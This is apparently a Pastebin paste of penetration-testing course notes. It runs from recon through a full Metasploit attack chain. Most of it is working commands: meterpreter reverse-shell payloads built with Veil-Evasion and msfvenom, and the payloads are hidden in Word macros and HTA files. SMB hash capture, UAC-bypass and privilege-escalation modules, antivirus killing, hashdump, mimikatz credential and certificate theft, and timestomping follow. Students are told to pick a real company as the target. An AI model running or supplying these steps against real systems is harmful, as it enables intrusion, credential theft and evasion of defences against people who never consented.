Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ##############################
- # Hacking Crash Course Day 1 #
- # Luke Ager #
- ##############################
- ###############
- # Virtual BOX #
- ###############
- - Although you can get the machines working in VMware workstation or fusion, i’ll be supporting VirtualBox for this course. You can use other products if you are happy with the correct usage.
- https://www.virtualbox.org/wiki/Downloads
- #####################################
- # Download the attack iso from Kali #
- #####################################
- https://www.kali.org/downloads/
- Install (do not boot live)
- ###########################
- # Download the victim VM# #
- ###########################
- https://drive.google.com/open?id=0BzsF4HrNTtXzemt6R1gybVZRczQ
- pass: Password1
- ########################################
- # Boot up the VM’s #
- # #
- ########################################
- Before you boot, check network adapters are bridged and check all guests are in same network and can ping each other.
- Log into your Kali box with the credentials you set during the install.
- ###########################
- # Finally getting started #
- ###########################
- /msfupdate
- /msfconsole
- ##############################################
- # Run any Linux command inside of MSFConsole #
- ##############################################
- ls
- pwd
- ping -c1 yahoo.com
- nmap yahoo.com
- ###############
- # Note taking #
- ###############
- Keep note
- #############################################################
- # Congratulations you are now a pentester, now get to work! #
- #############################################################
- You are a pentester for ACME corp and have been assigned to a new customer to conduct a red teaming test. You must gain access using the rules of engagement agreed with the customer.
- For this engagement, the customer has restricted the use of physical contact. The test must be limited to remote attacks only. No on premise social engineering.
- The customer is… (find one)
- (note - aim for a SME or enterprise organisation - you must not attack offensively and you accept any responsibility for your actions.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # RECON #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- - Let's start with a some simple recon with DNS
- Understand the attack surface, find a way in. Easy but very effective
- fierce -dns target.com
- dnsmap target.com
- look for remote worker access, vpn, citrix, outlook web access.
- -------------------------------
- - Now you have DNS names, you can probe them deeper with port scans to look for misconfigured ports or weaknesses. This usually gives results for the smaller companies. Doesn’t usually give much on the bigger ones. In honesty, I do not usually port scan the perimeter but there is certainly value in doing this. Personally, I attack users for credentials and then gain access the easy way.
- ########################################
- # NMAP Example #
- ########################################
- nmap target.com -A
- (do full port scan, banner grab, OS fingerprint, this is loud but on the external perimeter, not such a big issue)
- can also scan with metasploit if you prefer. Use auxiliary scanner.
- ########################################
- # Record all your findings in Keepnote #
- ########################################
- Now we have an understanding of the perimeter, lets look for targets. People are always the way in!
- Old school is still the best:
- theharvester -d target.com -b all -f target
- now we have some employees and their email addresses. Lets go hunting for the right target!
- My personal fav is LinkedInt however there is currently a bug. Worth checking on.
- ####################################
- # Use Maltego to resource targets. #
- ####################################
- Maltego is not always the answer but it does help with SE recon. Find a target and understand more about them before moving into weaponisation.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # WEAPONISATION #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ##################################
- # Basic Client-Side Exploitation #
- ##################################
- git clone https://github.com/Veil-Framework/Veil-Evasion
- cd Veil-Evasion/
- cd setup
- setup.sh -c
- Veil-Evasion.py -p powershell/meterpreter/rev_https -c LHOST=192.168.1.13 LPORT=443 PROXY=Y —overwrite
- copy payload path.
- python macro_safe.py %PATH FROM ABOVE% %Filename%
- copy output into MSoffice word macro.
- Set Macro object to AutoOpen() as detailed here http://wordmvp/FAQs/MacrosVBA/DocumentEvents.htm
- ##################################
- # Metasploit server #
- ##################################
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_https
- set lhost 192.168.1.13
- set lport 443
- set exitonsession false
- exploit -j
- (if you have speakers on kali -
- back
- load sounds
- )
- ####################################################
- # What if Macros don’t work? ….The Fireeye effect. #
- ####################################################
- Sometimes, tier 1/2 clients will have sandboxing solutions, so sometimes we need to get creative. Use windows features such as UNC/SMB and poor egress filtering, grab hashes. If that doesn’t work try HTA files.
- git clone https://github.com/vysec/genHTA
- cd genHTA
- python genHTA.py
- complete questions
- ls - should show output.hta
- run:
- msfvenom -a x86 —platform Windows -p windows/meterpreter/reverse_https LHOST=192.168.1.13 LPORT=443 -f hta-psh
- copy output and paste into the below:
- vim output.hta
- edit where ‘ character begins in Modifyme() function.
- mv output.hta /var/www/html
- service apache2 start
- browse to IP/output.hta from windows victim, download and run file using IE.
- ####################################################
- # When all else fails or you just want to double up #
- ####################################################
- Add quick part SMB to your office doc.
- Insert quick part,
- field,
- includepicture
- add. file://IP/file
- data not stored within document
- listen for hash using metasploit or responder.
- use auxiliary/server/capture/smb
- show options
- run
- or
- responder
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # DELIVERY #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Get creative
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # Exploitation #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- Technically we aren’t exploiting but depending on exploits available during your test you may use 0 days or exploits. When they aren’t available due to patching then social engineering is needed. 99% of my work is reliant on SE, user mistakes, not exploitation.
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- ########################################
- # COMMAND & CONTROL #
- ########################################
- !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
- get shell. Simples
- ###########################
- # Client-Side Enumeration #
- ###########################
- - You can list the active sessions by typing:
- sessions -l
- - You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
- sessions -i 1
- - You should now see Metasploit's meterpreter prompt.
- ********************************** Figure out who and where you are **********************************
- meterpreter> sysinfo
- meterpreter> getuid
- meterpreter> ipconfig
- meterpreter> run post/windows/gather/checkvm
- meterpreter> run get_local_subnets
- ********************************** Escalate privileges and get hashes **********************************
- most of the below won’t work on up to date machines… my preference is option 4. Older machines will have more success if patch level is out of date.
- meterpreter> use priv
- --Option 1: GetSystem
- meterpreter> getsystem
- --Option 2:
- meterpreter > run post/windows/escalate/getsystem
- --Option 3:
- meterpreter> background
- back
- use post/windows/escalate/droplnk
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 1234
- exploit
- --Option 4:
- use exploit/windows/local/bypassuac
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 12345
- exploit
- --Option 5:
- use exploit/windows/local/service_permissions
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 5555
- exploit
- --Option 6:
- use exploit/windows/local/trusted_service_path
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 4567
- exploit
- --Option 7:
- use exploit/windows/local/ppr_flatten_rec
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 7777
- exploit
- --Option 8:
- use exploit/windows/local/ms_ndproxy
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 7788
- exploit
- --Option 9:
- use exploit/windows/local/ask
- set SESSION 1
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.230.134 (Make sure you change this to your ip address)
- set LPORT 7799
- exploit
- meterpreter > getuid
- Server username: win7-64-victim\Workshop
- meterpreter > getsystem
- ...got system (via technique 1).
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- --------------------------------------------------------
- meterpreter> run killav
- meterpreter> run post/windows/gather/hashdump
- meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
- meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
- meterpreter> run post/windows/gather/credentials/credential_collector
- ************ Stealing credentials and certificates ************
- - NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
- meterpreter > getsystem
- meterpreter > load mimikatz
- meterpreter > kerberos
- meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
- meterpreter > msv <-- Your AD password
- meterpreter > livessp <-- Your Windows8 password
- meterpreter > ssp <-- Your outlook password
- meterpreter > tspkg <-- Your AD password
- meterpreter > wdigest <-- Your AD password
- meterpreter > mimikatz_command -f crypto::listStores
- meterpreter > mimikatz_command -f crypto::listCertificates
- meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
- meterpreter > mimikatz_command -f crypto::patchcapi
- meterpreter> search -d <directory> -f <file-pattern>
- ********************************** Enumerate the host you are on **********************************
- meterpreter > run getcountermeasure
- meterpreter > run post/windows/gather/enum_applications
- meterpreter > run post/windows/gather/enum_logged_on_users
- meterpreter > run post/windows/gather/usb_history
- meterpreter > run post/windows/gather/enum_shares
- meterpreter > run post/windows/gather/enum_snmp
- meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
- ********************************** Prove access **********************************
- meterpreter> upload /home/proof.txt c:\\
- meterpreter > timestomp C:\\proof.txt -v
- meterpreter > timestomp C:\\proof.txt -m "12/12/2014 12:12:14"
- meterpreter > timestomp C:\\proof.txt -v
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement